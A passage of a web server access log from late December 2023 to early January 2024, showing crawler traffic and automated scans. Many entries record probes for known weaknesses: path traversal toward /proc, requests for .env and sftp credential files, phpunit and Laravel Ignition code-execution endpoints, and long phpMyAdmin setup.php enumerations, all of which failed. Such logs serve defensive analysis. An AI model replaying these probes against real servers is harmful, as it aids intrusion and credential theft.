Gecko) Chrome/60.0.3112.113 Safari/537.36" 185.180.143.141 - - [31/Dec/2023:15:22:37 -0600] "GET /favicon.ico HTTP/1.1" 404 435 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" 185.180.143.141 - - [31/Dec/2023:15:22:51 -0600] "GET /admin/ HTTP/1.1" 404 435 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" 185.180.143.141 - - [31/Dec/2023:15:22:51 -0600] "GET /sugar_version.json HTTP/1.1" 404 435 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" 185.180.143.141 - - [31/Dec/2023:15:23:01 -0600] "GET /cgi-bin/authLogin.cgi HTTP/1.1" 404 435 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"

167.94.145.51 - - [31/Dec/2023:15:36:05 -0600] "GET / HTTP/1.1" 200 241 "-" "-" 167.94.145.51 - - [31/Dec/2023:15:36:08 -0600] "GET / HTTP/1.1" 200 241 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" 167.94.145.51 - - [31/Dec/2023:15:36:08 -0600] "PRI * HTTP/2.0" 400 0 "-" "-" 167.94.145.51 - - [31/Dec/2023:15:36:08 -0600] "GET /favicon.ico HTTP/1.1" 404 454 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"

137.184.255.55 - - [31/Dec/2023:16:32:10 -0600] "GET / HTTP/1.1" 200 241 "-" "Mozilla/5.0 zgrab/0.x"

183.195.120.174 - - [31/Dec/2023:16:32:36 -0600] "GET / HTTP/1.1" 200 260 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.84 Safari/537.36"

83.97.73.87 - - [31/Dec/2023:16:53:52 -0600] "GET / HTTP/1.1" 200 260 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 83.97.73.87 - - [31/Dec/2023:17:35:09 -0600] "GET / HTTP/1.1" 200 260 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 91.92.243.232 - - [31/Dec/2023:18:00:09 -0600] "GET / HTTP/1.1" 200 241 "-" "-" 91.92.243.232 - - [31/Dec/2023:18:00:15 -0600] "GET ../../proc/ HTTP" 400 0 "-" "-"

192.241.224.14 - - [31/Dec/2023:18:10:38 -0600] "MGLNDD_67.218.15.25_80\n" 400 0 "-" "-"

83.97.73.87 - - [31/Dec/2023:18:14:42 -0600] "POST /Autodiscover/Autodiscover.xml HTTP/1.1" 404 454 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"

192.241.224.28 - - [31/Dec/2023:18:18:38 -0600] "GET / HTTP/1.1" 200 241 "-" "Mozilla/5.0 zgrab/0.x"

54.219.171.118 - - [31/Dec/2023:18:27:29 -0600] "OPTIONS / HTTP/1.1" 200 181 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36"

183.249.113.64 - - [31/Dec/2023:18:30:05 -0600] "GET / HTTP/1.1" 200 260 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.84 Safari/537.36"

83.97.73.87 - - [31/Dec/2023:19:06:29 -0600] "POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 454 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 83.97.73.87 - - [31/Dec/2023:19:21:54 -0600] "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 454 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"

34.140.248.32 - - [31/Dec/2023:19:32:37 -0600] "GET / HTTP/1.1" 200 297 "-" "python-requests/2.31.0"

83.97.73.87 - - [31/Dec/2023:20:11:51 -0600] "GET /solr/admin/info/system?wt=json HTTP/1.1" 404 454 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"

52.81.61.158 - - [31/Dec/2023:20:14:38 -0600] "GET /.DS_Store HTTP/1.1" 404 435 "-" "Go-http-client/1.1"

198.199.118.103 - - [31/Dec/2023:20:33:03 -0600] "GET / HTTP/1.1" 200 241 "-" "Mozilla/5.0 zgrab/0.x"

83.97.73.87 - - [31/Dec/2023:20:33:44 -0600] "GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1" 200 260 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"

172.105.128.11 - - [31/Dec/2023:20:53:46 -0600] "\x16\x03\x01" 400 0 "-" "-"

103.203.57.7 - - [31/Dec/2023:20:59:13 -0600] "GET / HTTP/1.1" 200 260 "-" "HTTP Banner Detection (https://security.ipip.net)"

83.97.73.87 - - [31/Dec/2023:21:12:52 -0600] "GET /console/ HTTP/1.1" 404 454 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 83.97.73.87 - - [31/Dec/2023:21:44:13 -0600] "GET /_ignition/execute-solution HTTP/1.1" 404 454 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"

118.123.105.85 - - [31/Dec/2023:22:22:20 -0600] "\x16\x03\x01" 400 0 "-" "-" 118.123.105.85 - - [31/Dec/2023:22:22:21 -0600] "GET / HTTP/1.1" 200 241 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4 240.111 Safari/537.36" 118.123.105.85 - - [31/Dec/2023:22:22:21 -0600] "\x16\x03\x01" 400 0 "-" "-" 118.123.105.85 - - [31/Dec/2023:22:22:23 -0600] "\x16\x03\x01" 400 0 "-" "-" 118.123.105.85 - - [31/Dec/2023:22:22:24 -0600] "\x16\x03\x01" 400 0 "-" "-" 118.123.105.85 - - [31/Dec/2023:22:22:24 -0600] "\x16\x03\x01" 400 0 "-" "-" 118.123.105.85 - - [31/Dec/2023:22:22:25 -0600] "\x16\x03\x01" 400 0 "-" "-" 118.123.105.85 - - [31/Dec/2023:22:22:26 -0600] "\x16\x03\x01" 400 0 "-" "-"

78.153.140.219 - - [31/Dec/2023:22:56:17 -0600] "GET /.env HTTP/1.1" 404 491 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" 78.153.140.219 - - [31/Dec/2023:22:56:18 -0600] "\x16\x03\x01\x01H\x01" 400 0 "-" "-"

83.97.73.87 - - [31/Dec/2023:23:02:55 -0600] "GET / HTTP/1.1" 200 260 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 83.97.73.87 - - [31/Dec/2023:23:25:07 -0600] "GET / HTTP/1.1" 200 260 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"

193.106.29.122 - - [31/Dec/2023:23:31:33 -0600] "GET / HTTP/1.0" 200 260 "-" "Mozilla/5.0"

83.97.73.87 - - [31/Dec/2023:23:58:39 -0600] "GET /actuator/gateway/routes HTTP/1.1" 404 454 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"

January 1, 2024

83.97.73.87 - - [01/Jan/2024:00:44:42 -0600] "GET /geoserver HTTP/1.1" 404 454 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"

185.224.128.191 - - [01/Jan/2024:00:56:36 -0600] "GET / HTTP/1.1" 200 297 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"

64.62.197.58 - - [01/Jan/2024:01:24:46 -0600] "\x16\x03\x01" 400 0 "-" "-"

139.59.9.151 - - [01/Jan/2024:02:13:18 -0600] "\x16\x03\x01" 400 0 "-" "-" 139.59.9.151 - - [01/Jan/2024:02:13:24 -0600] "\x16\x03\x01" 400 0 "-" "-" 139.59.9.151 - - [01/Jan/2024:02:13:31 -0600] "GET / HTTP/1.1" 200 241 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36" 139.59.9.151 - - [01/Jan/2024:02:13:32 -0600] "GET /form.html HTTP/1.1" 404 435 "-" "curl/8.1.2" 139.59.9.151 - - [01/Jan/2024:02:13:32 -0600] "GET /upl.php HTTP/1.1" 404 435 "-" "Mozilla/5.0" 139.59.9.151 - - [01/Jan/2024:02:13:33 -0600] "\x16\x03\x01" 400 0 "-" "-" 139.59.9.151 - - [01/Jan/2024:02:13:33 -0600] "GET /geoip/ HTTP/1.1" 404 435 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36" 139.59.9.151 - - [01/Jan/2024:02:13:34 -0600] "GET /favicon.ico HTTP/1.1" 404 435 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36" 139.59.9.151 - - [01/Jan/2024:02:13:34 -0600] "GET /1.php HTTP/1.1" 404 435 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36" 139.59.9.151 - - [01/Jan/2024:02:13:35 -0600] "GET /bundle.js HTTP/1.1" 404 435 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36" 139.59.9.151 - - [01/Jan/2024:02:13:36 -0600] "GET /files/ HTTP/1.1" 404 435 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36" 139.59.9.151 - - [01/Jan/2024:02:13:36 -0600] "GET /systembc/password.php HTTP/1.1" 404 435 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36" 139.59.9.151 - - [01/Jan/2024:02:13:37 -0600] "GET /password.php HTTP/1.1" 404 435 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36" 139.59.9.151 - - [01/Jan/2024:02:13:37 -0600] "GET /info.php HTTP/1.1" 404 435 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"

45.142.182.103 - - [01/Jan/2024:02:48:28 -0600] "GET / HTTP/1.1" 200 241 "-" "-"

106.4.161.9 - - [01/Jan/2024:02:50:18 -0600] "\x16\x03\x01" 400 0 "-" "-"

117.14.115.90 - - [01/Jan/2024:02:50:19 -0600] "\x16\x03\x01" 400 0 "-" "-"

219.143.197.1 - - [01/Jan/2024:02:55:18 -0600] "-" 408 0 "-" "-"

74.82.47.3 - - [01/Jan/2024:03:00:54 -0600] "GET / HTTP/1.1" 200 241 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/110.0" 74.82.47.3 - - [01/Jan/2024:03:03:31 -0600] "GET /favicon.ico HTTP/1.1" 404 435 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.6.1 Safari/605.1.15" 74.82.47.3 - - [01/Jan/2024:03:04:23 -0600] "GET /geoserver/web/ HTTP/1.1" 404 435 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/110.0"

194.33.191.135 - - [01/Jan/2024:03:15:39 -0600] "GET /.env HTTP/1.1" 404 491 "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30" 194.33.191.135 - - [01/Jan/2024:03:15:40 -0600] "POST / HTTP/1.1" 200 297 "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30"

52.80.126.145 - - [01/Jan/2024:03:36:14 -0600] "GET /.vscode/sftp.json HTTP/1.1" 404 435 "-" "Go-http-client/1.1"

162.216.149.150 - - [01/Jan/2024:03:49:32 -0600] "GET / HTTP/1.1" 200 241 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"

34.151.220.40 - - [01/Jan/2024:03:56:37 -0600] "\x16\x03\x01" 400 0 "-" "-" 34.151.220.40 - - [01/Jan/2024:03:56:40 -0600] "OPTIONS / HTTP/1.0" 200 181 "-" "-"

111.15.178.177 - - [01/Jan/2024:04:17:27 -0600] "GET / HTTP/1.1" 200 260 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.84 Safari/537.36"

207.46.13.230 - - [01/Jan/2024:05:19:37 -0600] "GET /robots.txt HTTP/1.1" 404 491 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"

157.55.39.9 - - [01/Jan/2024:05:19:47 -0600] "GET / HTTP/1.1" 304 123 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"

47.106.35.122 - - [01/Jan/2024:05:47:08 -0600] "GET http://67.218.15.25:80/phpMyAdmin/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 47.106.35.122 - - [01/Jan/2024:05:47:08 -0600] "GET http://67.218.15.25:80/phpmyadmin/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 47.106.35.122 - - [01/Jan/2024:05:47:10 -0600] "GET http://67.218.15.25:80/phpMyAdmin-2.11.4/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 47.106.35.122 - - [01/Jan/2024:05:47:11 -0600] "GET http://67.218.15.25:80/phpMyAdmin-2.11.3/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 47.106.35.122 - - [01/Jan/2024:05:47:11 -0600] "GET http://67.218.15.25:80/phpMyAdmin-2.10.0.2/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 47.106.35.122 - - [01/Jan/2024:05:47:12 -0600] "GET http://67.218.15.25:80/phpMyAdmin-2.10.3/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 47.106.35.122 - - [01/Jan/2024:05:47:13 -0600] "GET http://67.218.15.25:80/phpMyAdmin-2.8.0.2/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 47.106.35.122 - - [01/Jan/2024:05:47:13 -0600] "GET http://67.218.15.25:80/phpMyAdmin-2.10.2/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 47.106.35.122 - - [01/Jan/2024:05:47:14 -0600] "GET http://67.218.15.25:80/phpMyAdmin-2.11.9.2/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 47.106.35.122 - - [01/Jan/2024:05:47:15 -0600] "GET http://67.218.15.25:80/phpMyAdmin-2.11.0/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 47.106.35.122 - - [01/Jan/2024:05:47:16 -0600] "GET http://67.218.15.25:80/phpMyAdmin-2.11.7/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 47.106.35.122 - - [01/Jan/2024:05:47:16 -0600] "GET http://67.218.15.25:80/phpMyAdmin-2.11.1.2/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 47.106.35.122 - - [01/Jan/2024:05:47:17 -0600] "GET http://67.218.15.25:80/pma/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 47.106.35.122 - - [01/Jan/2024:05:47:18 -0600] "GET http://67.218.15.25:80/phpMyAdmin3/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 47.106.35.122 - - [01/Jan/2024:05:47:18 -0600] "GET http://67.218.15.25:80/myadmin/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 47.106.35.122 - - [01/Jan/2024:05:47:19 -0600] "GET http://67.218.15.25:80/MyAdmin/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 47.106.35.122 - - [01/Jan/2024:05:47:20 -0600] "GET http://67.218.15.25:80/PHPMYADMIN/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 47.106.35.122 - - [01/Jan/2024:05:47:20 -0600] "GET http://67.218.15.25:80/mysqladmin/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 47.106.35.122 - - [01/Jan/2024:05:47:21 -0600] "GET http://67.218.15.25:80/SQL/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 47.106.35.122 - - [01/Jan/2024:05:47:22 -0600] "GET http://67.218.15.25:80/phpMyAdmin-2.5.5-pl1/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 47.106.35.122 - - [01/Jan/2024:05:47:22 -0600] "GET http://67.218.15.25:80/phpMyAdmin-2.5.5/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 47.106.35.122 - - [01/Jan/2024:05:47:23 -0600] "GET http://67.218.15.25:80/phpMyAdmin-2.5.4/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 47.106.35.122 - - [01/Jan/2024:05:47:24 -0600] "GET http://67.218.15.25:80/phpMyAdmin-2.5.7-pl1/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 47.106.35.122 - - [01/Jan/2024:05:47:24 -0600] "GET http://67.218.15.25:80/admin/pma/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 47.106.35.122 - - [01/Jan/2024:05:47:25 -0600] "GET http://67.218.15.25:80/phpMyAdmin-2/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 47.106.35.122 - - [01/Jan/2024:05:47:26 -0600] "GET http://67.218.15.25:80/web/phpMyAdmin/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 47.106.35.122 - - [01/Jan/2024:05:47:26 -0600] "GET http://67.218.15.25:80/webadmin/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 47.106.35.122 - - [01/Jan/2024:05:47:28 -0600] "GET http://67.218.15.25:80/admin/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 47.106.35.122 - - [01/Jan/2024:05:47:29 -0600] "GET http://67.218.15.25:80/dbadmin/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 47.106.35.122 - - [01/Jan/2024:05:47:30 -0600] "GET http://67.218.15.25:80/mysql/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 47.106.35.122 - - [01/Jan/2024:05:47:31 -0600] "GET http://67.218.15.25:80/phpMyAdmin2/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 47.106.35.122 - - [01/Jan/2024:05:47:33 -0600] "GET http://67.218.15.25:80/phpma/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 47.106.35.122 - - [01/Jan/2024:05:47:34 -0600] "GET http://67.218.15.25:80/sqlweb/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 47.106.35.122 - - [01/Jan/2024:05:47:35 -0600] "GET http://67.218.15.25:80/webdb/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 47.106.35.122 - - [01/Jan/2024:05:47:35 -0600] "GET http://67.218.15.25:80/websql/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 47.106.35.122 - - [01/Jan/2024:05:47:36 -0600] "GET http://67.218.15.25:80/_phpMyAdmin/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 47.106.35.122 - - [01/Jan/2024:05:47:37 -0600] "GET http://67.218.15.25:80/php/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 47.106.35.122 - - [01/Jan/2024:05:47:38 -0600] "GET http://67.218.15.25:80/admin/phpmyadmin/scripts/setup.txt HTTP/1.0" 404 454 "-" "-" 47.106.35.122 - - [01/Jan/2024:05:47:38 -0600] "GET http://67.218.15.25:80/db/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 47.106.35.122 - - [01/Jan/2024:05:47:39 -0600] "GET http://67.218.15.25:80/sqlmanager/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 47.106.35.122 - - [01/Jan/2024:05:47:41 -0600] "GET http://67.218.15.25:80/mysqlmanager/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 47.106.35.122 - - [01/Jan/2024:05:47:41 -0600] "GET http://67.218.15.25:80/phpmanager/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 47.106.35.122 - - [01/Jan/2024:05:47:42 -0600] "GET http://67.218.15.25:80/php-myadmin/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 47.106.35.122 - - [01/Jan/2024:05:47:43 -0600] "GET http://67.218.15.25:80/phpmy-admin/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 47.106.35.122 - - [01/Jan/2024:05:47:44 -0600] "GET http://67.218.15.25:80/mysql-admin/scripts/setup.php HTTP/1.0" 404 454 "-" "-"

185.224.128.191 - - [01/Jan/2024:06:14:29 -0600] "GET / HTTP/1.1" 200 297 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"

98.128.166.81 - - [01/Jan/2024:06:18:17 -0600] "GET / HTTP/1.1" 200 241 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"

94.102.61.10 - - [01/Jan/2024:06:34:57 -0600] "GET / HTTP/1.1" 200 241 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36"

185.224.128.191 - - [01/Jan/2024:08:41:41 -0600] "GET / HTTP/1.1" 200 297 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"

36.111.149.227 - - [01/Jan/2024:09:10:00 -0600] "GET / HTTP/1.1" 200 260 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.84 Safari/537.36"

94.102.61.80 - - [01/Jan/2024:10:09:34 -0600] "GET / HTTP/1.1" 200 241 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36"

112.213.110.8 - - [01/Jan/2024:10:13:06 -0600] "GET http://67.218.15.25:80/phpMyAdmin/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 112.213.110.8 - - [01/Jan/2024:10:13:06 -0600] "GET http://67.218.15.25:80/phpmyadmin/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 112.213.110.8 - - [01/Jan/2024:10:13:07 -0600] "GET http://67.218.15.25:80/phpMyAdmin-2.11.4/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 112.213.110.8 - - [01/Jan/2024:10:13:07 -0600] "GET http://67.218.15.25:80/phpMyAdmin-2.11.3/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 112.213.110.8 - - [01/Jan/2024:10:13:08 -0600] "GET http://67.218.15.25:80/phpMyAdmin-2.10.0.2/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 112.213.110.8 - - [01/Jan/2024:10:13:08 -0600] "GET http://67.218.15.25:80/phpMyAdmin-2.10.3/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 112.213.110.8 - - [01/Jan/2024:10:13:09 -0600] "GET http://67.218.15.25:80/phpMyAdmin-2.8.0.2/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 112.213.110.8 - - [01/Jan/2024:10:13:10 -0600] "GET http://67.218.15.25:80/phpMyAdmin-2.10.2/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 112.213.110.8 - - [01/Jan/2024:10:13:10 -0600] "GET http://67.218.15.25:80/phpMyAdmin-2.11.9.2/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 112.213.110.8 - - [01/Jan/2024:10:13:12 -0600] "GET http://67.218.15.25:80/phpMyAdmin-2.11.0/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 112.213.110.8 - - [01/Jan/2024:10:13:12 -0600] "GET http://67.218.15.25:80/phpMyAdmin-2.11.7/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 112.213.110.8 - - [01/Jan/2024:10:13:13 -0600] "GET http://67.218.15.25:80/phpMyAdmin-2.11.1.2/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 112.213.110.8 - - [01/Jan/2024:10:13:13 -0600] "GET http://67.218.15.25:80/pma/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 112.213.110.8 - - [01/Jan/2024:10:13:14 -0600] "GET http://67.218.15.25:80/phpMyAdmin3/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 112.213.110.8 - - [01/Jan/2024:10:13:19 -0600] "GET http://67.218.15.25:80/MyAdmin/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 112.213.110.8 - - [01/Jan/2024:10:13:19 -0600] "GET http://67.218.15.25:80/PHPMYADMIN/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 112.213.110.8 - - [01/Jan/2024:10:13:20 -0600] "GET http://67.218.15.25:80/mysqladmin/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 112.213.110.8 - - [01/Jan/2024:10:13:20 -0600] "GET http://67.218.15.25:80/SQL/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 112.213.110.8 - - [01/Jan/2024:10:13:21 -0600] "GET http://67.218.15.25:80/phpMyAdmin-2.5.5-pl1/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 112.213.110.8 - - [01/Jan/2024:10:13:21 -0600] "GET http://67.218.15.25:80/phpMyAdmin-2.5.5/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 112.213.110.8 - - [01/Jan/2024:10:13:21 -0600] "GET http://67.218.15.25:80/phpMyAdmin-2.5.4/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 112.213.110.8 - - [01/Jan/2024:10:13:22 -0600] "GET http://67.218.15.25:80/phpMyAdmin-2.5.7-pl1/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 112.213.110.8 - - [01/Jan/2024:10:13:25 -0600] "GET http://67.218.15.25:80/admin/pma/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 112.213.110.8 - - [01/Jan/2024:10:13:26 -0600] "GET http://67.218.15.25:80/phpMyAdmin-2/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 112.213.110.8 - - [01/Jan/2024:10:13:26 -0600] "GET http://67.218.15.25:80/web/phpMyAdmin/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 112.213.110.8 - - [01/Jan/2024:10:13:27 -0600] "GET http://67.218.15.25:80/webadmin/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 112.213.110.8 - - [01/Jan/2024:10:13:27 -0600] "GET http://67.218.15.25:80/admin/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 112.213.110.8 - - [01/Jan/2024:10:13:27 -0600] "GET http://67.218.15.25:80/dbadmin/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 112.213.110.8 - - [01/Jan/2024:10:13:28 -0600] "GET http://67.218.15.25:80/mysql/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 112.213.110.8 - - [01/Jan/2024:10:13:28 -0600] "GET http://67.218.15.25:80/phpMyAdmin2/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 112.213.110.8 - - [01/Jan/2024:10:13:29 -0600] "GET http://67.218.15.25:80/phpma/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 112.213.110.8 - - [01/Jan/2024:10:13:29 -0600] "GET http://67.218.15.25:80/sqlweb/scripts/setup.php HTTP/1.0" 404 454 